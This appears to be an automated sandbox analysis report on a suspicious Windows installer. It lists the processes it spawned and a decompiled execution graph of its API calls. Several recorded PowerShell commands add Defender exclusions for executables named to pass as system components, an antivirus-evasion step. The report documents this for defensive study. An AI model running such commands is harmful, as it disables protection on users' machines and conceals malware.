                                                                                                                                                                                                                                                                                    Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:10
                                                                                                                                                                                                                                                                                    Start time:15:12:06
                                                                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exe'
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:11
                                                                                                                                                                                                                                                                                    Start time:15:12:07
                                                                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:12
                                                                                                                                                                                                                                                                                    Start time:15:12:07
                                                                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:16
                                                                                                                                                                                                                                                                                    Start time:15:12:22
                                                                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Shell Experience Host.exe'
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:17
                                                                                                                                                                                                                                                                                    Start time:15:12:22
                                                                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:18
                                                                                                                                                                                                                                                                                    Start time:15:12:35
                                                                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4292 --field-trial-handle=1920,i,15032320318420577648,13703191311739689731,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff715980000
                                                                                                                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                    Target ID:19
                                                                                                                                                                                                                                                                                    Start time:15:12:35
                                                                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4184 --field-trial-handle=1920,i,15032320318420577648,13703191311739689731,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff715980000
                                                                                                                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:20
                                                                                                                                                                                                                                                                                    Start time:15:12:41
                                                                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Realtek HD Audio Universal Service.exe'
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:21
                                                                                                                                                                                                                                                                                    Start time:15:12:41
                                                                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:23
                                                                                                                                                                                                                                                                                    Start time:15:12:59
                                                                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Windows Shell Experience Host.exe'
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:24
                                                                                                                                                                                                                                                                                    Start time:15:12:59
                                                                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:25
                                                                                                                                                                                                                                                                                    Start time:15:13:29
                                                                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Realtek HD Audio Universal Service.exe'
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:26
                                                                                                                                                                                                                                                                                    Start time:15:13:29
                                                                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                    Target ID:27
                                                                                                                                                                                                                                                                                    Start time:15:13:53
                                                                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Shell Experience Host.exe'
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:28
                                                                                                                                                                                                                                                                                    Start time:15:13:53
                                                                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                    Reset < >

                                                                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                                                                      Execution Coverage:12.9%
                                                                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                      Signature Coverage:21.9%
                                                                                                                                                                                                                                                                                      Total number of Nodes:1264
                                                                                                                                                                                                                                                                                      Total number of Limit Nodes:21
                                                                                                                                                                                                                                                                                      execution_graph 2722 401dc1 2734 402a0c 2722->2734 2725 402a0c 18 API calls 2726 401dd0 2725->2726 2727 402a0c 18 API calls 2726->2727 2728 401dd9 2727->2728 2729 402a0c 18 API calls 2728->2729 2730 401de2 2729->2730 2740 401423 2730->2740 2733 401e16 2735 402a18 2734->2735 2743 405bc3 2735->2743 2738 401dc7 2738->2725 2783 404e8d 2740->2783 2748 405bd0 2743->2748 2744 405dea 2745 402a39 2744->2745 2778 405ba1 lstrcpynA 2744->2778 2745->2738 2762 405e03 2745->2762 2747 405c68 GetVersion 2759 405c75 2747->2759 2748->2744 2748->2747 2749 405dc1 lstrlenA 2748->2749 2752 405bc3 10 API calls 2748->2752 2756 405e03 5 API calls 2748->2756 2776 405aff wsprintfA 2748->2776 2777 405ba1 lstrcpynA 2748->2777 2749->2748 2752->2749 2753 405ce0 GetSystemDirectoryA 2753->2759 2755 405cf3 GetWindowsDirectoryA 2755->2759 2756->2748 2757 405d6a lstrcatA 2757->2748 2758 405d27 SHGetSpecialFolderLocation 2758->2759 2761 405d3f SHGetPathFromIDListA CoTaskMemFree 2758->2761 2759->2748 2759->2753 2759->2755 2759->2757 2759->2758 2760 405bc3 10 API calls 2759->2760 2771 405a88 RegOpenKeyExA 2759->2771 2760->2759 2761->2759 2769 405e0f 2762->2769 2763 405e77 2764 405e7b CharPrevA 2763->2764 2766 405e96 2763->2766 2764->2763 2765 405e6c CharNextA 2765->2763 2765->2769 2766->2738 2768 405e5a CharNextA 2768->2769 2769->2763 2769->2765 2769->2768 2770 405e67 CharNextA 2769->2770 2779 4056bf 2769->2779 2770->2765 2772 405af9 2771->2772 2773 405abb RegQueryValueExA 2771->2773 2772->2759 2774 405adc RegCloseKey 2773->2774 2774->2772 2776->2748 2777->2748 2778->2745 2780 4056c5 2779->2780 2781 4056d8 2780->2781 2782 4056cb CharNextA 2780->2782 2781->2769 2782->2780 2784 401431 ShellExecuteA 2783->2784 2785 404ea8 2783->2785 2784->2733 2786 404ec5 lstrlenA 2785->2786 2787 405bc3 18 API calls 2785->2787 2788 404ed3 lstrlenA 2786->2788 2789 404eee 2786->2789 2787->2786 2788->2784 2790 404ee5 lstrcatA 2788->2790 2791 404f01 2789->2791 2792 404ef4 SetWindowTextA 2789->2792 2790->2789 2791->2784 2793 404f07 SendMessageA SendMessageA SendMessageA 2791->2793 2792->2791 2793->2784 3278 401cc1 GetDlgItem GetClientRect 3279 402a0c 18 API calls 3278->3279 3280 401cf1 LoadImageA SendMessageA 3279->3280 3281 4028a1 3280->3281 3282 401d0f DeleteObject 3280->3282 3282->3281 3283 401645 3284 402a0c 18 API calls 3283->3284 3285 40164c 3284->3285 3286 402a0c 18 API calls 3285->3286 3287 401655 3286->3287 3288 402a0c 18 API calls 3287->3288 3289 40165e MoveFileA 3288->3289 3290 401671 3289->3290 3291 40166a 3289->3291 3293 405e9c 2 API calls 3290->3293 3295 40217f 3290->3295 3292 401423 25 API calls 3291->3292 3292->3295 3294 401680 3293->3294 3294->3295 3296 4058ef 40 API calls 3294->3296 3296->3291 3297 401ec5 3298 402a0c 18 API calls 3297->3298 3299 401ecc 3298->3299 3300 405f2d 5 API calls 3299->3300 3301 401edb 3300->3301 3302 401ef3 GlobalAlloc 3301->3302 3304 401f5b 3301->3304 3303 401f07 3302->3303 3302->3304 3305 405f2d 5 API calls 3303->3305 3306 401f0e 3305->3306 3307 405f2d 5 API calls 3306->3307 3308 401f18 3307->3308 3308->3304 3312 405aff wsprintfA 3308->3312 3310 401f4f 3313 405aff wsprintfA 3310->3313 3312->3310 3313->3304 3314 4023c5 3325 402b16 3314->3325 3316 4023cf 3317 402a0c 18 API calls 3316->3317 3318 4023d8 3317->3318 3319 4023e2 RegQueryValueExA 3318->3319 3323 402672 3318->3323 3320 402402 3319->3320 3321 402408 RegCloseKey 3319->3321 3320->3321 3329 405aff wsprintfA 3320->3329 3321->3323 3326 402a0c 18 API calls 3325->3326 3327 402b2f 3326->3327 3328 402b3d RegOpenKeyExA 3327->3328 3328->3316 3329->3321 3333 404fcb 3334 405177 3333->3334 3335 404fec GetDlgItem GetDlgItem GetDlgItem 3333->3335 3337 405180 GetDlgItem CreateThread CloseHandle 3334->3337 3338 4051a8 3334->3338 3379 403e92 SendMessageA 3335->3379 3337->3338 3340 4051d3 3338->3340 3341 4051f5 3338->3341 3342 4051bf ShowWindow ShowWindow 3338->3342 3339 40505d 3346 405064 GetClientRect GetSystemMetrics SendMessageA SendMessageA 3339->3346 3343 4051e4 3340->3343 3344 40520a ShowWindow 3340->3344 3347 405231 3340->3347 3388 403ec4 3341->3388 3384 403e92 SendMessageA 3342->3384 3385 403e36 3343->3385 3351 40522a 3344->3351 3352 40521c 3344->3352 3353 4050d3 3346->3353 3354 4050b7 SendMessageA SendMessageA 3346->3354 3347->3341 3355 40523c SendMessageA 3347->3355 3350 405203 3357 403e36 SendMessageA 3351->3357 3356 404e8d 25 API calls 3352->3356 3358 4050e6 3353->3358 3359 4050d8 SendMessageA 3353->3359 3354->3353 3355->3350 3360 405255 CreatePopupMenu 3355->3360 3356->3351 3357->3347 3380 403e5d 3358->3380 3359->3358 3361 405bc3 18 API calls 3360->3361 3364 405265 AppendMenuA 3361->3364 3363 4050f6 3367 405133 GetDlgItem SendMessageA 3363->3367 3368 4050ff ShowWindow 3363->3368 3365 405278 GetWindowRect 3364->3365 3366 40528b 3364->3366 3369 405294 TrackPopupMenu 3365->3369 3366->3369 3367->3350 3371 40515a SendMessageA SendMessageA 3367->3371 3370 405115 ShowWindow 3368->3370 3373 405122 3368->3373 3369->3350 3372 4052b2 3369->3372 3370->3373 3371->3350 3374 4052ce SendMessageA 3372->3374 3383 403e92 SendMessageA 3373->3383 3374->3374 3376 4052eb OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3374->3376 3377 40530d SendMessageA 3376->3377 3377->3377 3378 40532e GlobalUnlock SetClipboardData CloseClipboard 3377->3378 3378->3350 3379->3339 3381 405bc3 18 API calls 3380->3381 3382 403e68 SetDlgItemTextA 3381->3382 3382->3363 3383->3367 3384->3340 3386 403e43 SendMessageA 3385->3386 3387 403e3d 3385->3387 3386->3341 3387->3386 3389 403edc GetWindowLongA 3388->3389 3399 403f65 3388->3399 3390 403eed 3389->3390 3389->3399 3391 403efc GetSysColor 3390->3391 3392 403eff 3390->3392 3391->3392 3393 403f05 SetTextColor 3392->3393 3394 403f0f SetBkMode 3392->3394 3393->3394 3395 403f27 GetSysColor 3394->3395 3396 403f2d 3394->3396 3395->3396 3397 403f34 SetBkColor 3396->3397 3398 403f3e 3396->3398 3397->3398 3398->3399 3400 403f51 DeleteObject 3398->3400 3401 403f58 CreateBrushIndirect 3398->3401 3399->3350 3400->3401 3401->3399 3402 402b51 3403 402b60 SetTimer 3402->3403 3404 402b79 3402->3404 3403->3404 3405 402bce 3404->3405 3406 402b93 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 3404->3406 3406->3405 3407 404254 3408 404264 3407->3408 3409 40428a 3407->3409 3411 403e5d 19 API calls 3408->3411 3410 403ec4 8 API calls 3409->3410 3412 404296 3410->3412 3413 404271 SetDlgItemTextA 3411->3413 3413->3409 3414 402654 3415 402a0c 18 API calls 3414->3415 3416 40265b FindFirstFileA 3415->3416 3417 40267e 3416->3417 3421 40266e 3416->3421 3422 405aff wsprintfA 3417->3422 3419 402685 3423 405ba1 lstrcpynA 3419->3423 3422->3419 3423->3421 3424 4024d4 3425 4024d9 3424->3425 3426 4024ea 3424->3426 3433 4029ef 3425->3433 3428 402a0c 18 API calls 3426->3428 3429 4024f1 lstrlenA 3428->3429 3430 4024e0 3429->3430 3431 402510 WriteFile 3430->3431 3432 402672 3430->3432 3431->3432 3434 405bc3 18 API calls 3433->3434 3435 402a03 3434->3435 3435->3430 3436 4014d6 3437 4029ef 18 API calls 3436->3437 3438 4014dc Sleep 3437->3438 3440 4028a1 3438->3440 3446 4018d8 3447 40190f 3446->3447 3448 402a0c 18 API calls 3447->3448 3449 401914 3448->3449 3450 4054c6 70 API calls 3449->3450 3451 40191d 3450->3451 3452 4018db 3453 402a0c 18 API calls 3452->3453 3454 4018e2 3453->3454 3455 405462 MessageBoxIndirectA 3454->3455 3456 4018eb 3455->3456 3457 4047dc GetDlgItem GetDlgItem 3458 404830 7 API calls 3457->3458 3467 404a4d 3457->3467 3459 4048d6 DeleteObject 3458->3459 3460 4048c9 SendMessageA 3458->3460 3461 4048e1 3459->3461 3460->3459 3462 404918 3461->3462 3466 405bc3 18 API calls 3461->3466 3464 403e5d 19 API calls 3462->3464 3463 404b37 3465 404be6 3463->3465 3469 404a40 3463->3469 3475 404b90 SendMessageA 3463->3475 3468 40492c 3464->3468 3470 404bfb 3465->3470 3471 404bef SendMessageA 3465->3471 3472 4048fa SendMessageA SendMessageA 3466->3472 3467->3463 3491 404ac1 3467->3491 3510 40475c SendMessageA 3467->3510 3474 403e5d 19 API calls 3468->3474 3476 403ec4 8 API calls 3469->3476 3478 404c14 3470->3478 3479 404c0d ImageList_Destroy 3470->3479 3487 404c24 3470->3487 3471->3470 3472->3461 3492 40493a 3474->3492 3475->3469 3481 404ba5 SendMessageA 3475->3481 3482 404dd6 3476->3482 3477 404b29 SendMessageA 3477->3463 3483 404c1d GlobalFree 3478->3483 3478->3487 3479->3478 3480 404d8a 3480->3469 3488 404d9c ShowWindow GetDlgItem ShowWindow 3480->3488 3485 404bb8 3481->3485 3483->3487 3484 404a0e GetWindowLongA SetWindowLongA 3486 404a27 3484->3486 3498 404bc9 SendMessageA 3485->3498 3489 404a45 3486->3489 3490 404a2d ShowWindow 3486->3490 3487->3480 3496 40140b 2 API calls 3487->3496 3502 404c56 3487->3502 3488->3469 3509 403e92 SendMessageA 3489->3509 3508 403e92 SendMessageA 3490->3508 3491->3463 3491->3477 3492->3484 3495 404989 SendMessageA 3492->3495 3499 404a08 3492->3499 3500 4049c5 SendMessageA 3492->3500 3501 4049d6 SendMessageA 3492->3501 3495->3492 3496->3502 3497 404c9a 3503 404d60 InvalidateRect 3497->3503 3507 404d0e SendMessageA SendMessageA 3497->3507 3498->3465 3499->3484 3499->3486 3500->3492 3501->3492 3502->3497 3505 404c84 SendMessageA 3502->3505 3503->3480 3504 404d76 3503->3504 3515 404717 3504->3515 3505->3497 3507->3497 3508->3469 3509->3467 3511 4047bb SendMessageA 3510->3511 3512 40477f GetMessagePos ScreenToClient SendMessageA 3510->3512 3513 4047b3 3511->3513 3512->3513 3514 4047b8 3512->3514 3513->3491 3514->3511 3518 404652 3515->3518 3517 40472c 3517->3480 3519 404668 3518->3519 3520 405bc3 18 API calls 3519->3520 3521 4046cc 3520->3521 3522 405bc3 18 API calls 3521->3522 3523 4046d7 3522->3523 3524 405bc3 18 API calls 3523->3524 3525 4046ed lstrlenA wsprintfA SetDlgItemTextA 3524->3525 3525->3517 3526 404ddd 3527 404e02 3526->3527 3528 404deb 3526->3528 3530 404e10 IsWindowVisible 3527->3530 3536 404e27 3527->3536 3529 404df1 3528->3529 3544 404e6b 3528->3544 3531 403ea9 SendMessageA 3529->3531 3533 404e1d 3530->3533 3530->3544 3534 404dfb 3531->3534 3532 404e71 CallWindowProcA 3532->3534 3535 40475c 5 API calls 3533->3535 3535->3536 3536->3532 3545 405ba1 lstrcpynA 3536->3545 3538 404e56 3546 405aff wsprintfA 3538->3546 3540 404e5d 3541 40140b 2 API calls 3540->3541 3542 404e64 3541->3542 3547 405ba1 lstrcpynA 3542->3547 3544->3532 3545->3538 3546->3540 3547->3544 3548 4025e2 3549 4025e9 3548->3549 3552 40284e 3548->3552 3550 4029ef 18 API calls 3549->3550 3551 4025f4 3550->3551 3553 4025fb SetFilePointer 3551->3553 3553->3552 3554 40260b 3553->3554 3556 405aff wsprintfA 3554->3556 3556->3552 3557 401ae5 3558 402a0c 18 API calls 3557->3558 3559 401aec 3558->3559 3560 4029ef 18 API calls 3559->3560 3561 401af5 wsprintfA 3560->3561 3562 4028a1 3561->3562 3563 4019e6 3564 402a0c 18 API calls 3563->3564 3565 4019ef ExpandEnvironmentStringsA 3564->3565 3566 401a03 3565->3566 3568 401a16 3565->3568 3567 401a08 lstrcmpA 3566->3567 3566->3568 3567->3568 3569 401f67 3570 401f79 3569->3570 3571 402028 3569->3571 3572 402a0c 18 API calls 3570->3572 3573 401423 25 API calls 3571->3573 3574 401f80 3572->3574 3580 40217f 3573->3580 3575 402a0c 18 API calls 3574->3575 3576 401f89 3575->3576 3577 401f91 GetModuleHandleA 3576->3577 3578 401f9e LoadLibraryExA 3576->3578 3577->3578 3579 401fae GetProcAddress 3577->3579 3578->3571 3578->3579 3581 401ffb 3579->3581 3582 401fbe 3579->3582 3583 404e8d 25 API calls 3581->3583 3584 401423 25 API calls 3582->3584 3585 401fce 3582->3585 3583->3585 3584->3585 3585->3580 3586 40201c FreeLibrary 3585->3586 3586->3580 3587 4045ec 3588 404618 3587->3588 3589 4045fc 3587->3589 3591 40464b 3588->3591 3592 40461e SHGetPathFromIDListA 3588->3592 3598 405446 GetDlgItemTextA 3589->3598 3594 404635 SendMessageA 3592->3594 3595 40462e 3592->3595 3593 404609 SendMessageA 3593->3588 3594->3591 3596 40140b 2 API calls 3595->3596 3596->3594 3598->3593 3599 401c6d 3600 4029ef 18 API calls 3599->3600 3601 401c73 IsWindow 3600->3601 3602 4019d6 3601->3602 3603 4014f0 SetForegroundWindow 3604 4028a1 3603->3604 3605 403f71 lstrcpynA lstrlenA 3606 4016fa 3607 402a0c 18 API calls 3606->3607 3608 401701 SearchPathA 3607->3608 3609 4027cc 3608->3609 3610 40171c 3608->3610 3610->3609 3612 405ba1 lstrcpynA 3610->3612 3612->3609 3613 40287c SendMessageA 3614 4028a1 3613->3614 3615 402896 InvalidateRect 3613->3615 3615->3614 3616 40227d 3617 402a0c 18 API calls 3616->3617 3618 40228b 3617->3618 3619 402a0c 18 API calls 3618->3619 3620 402294 3619->3620 3621 402a0c 18 API calls 3620->3621 3622 40229e GetPrivateProfileStringA 3621->3622 3623 4014fe 3624 401506 3623->3624 3626 401519 3623->3626 3625 4029ef 18 API calls 3624->3625 3625->3626 3627 401000 3628 401037 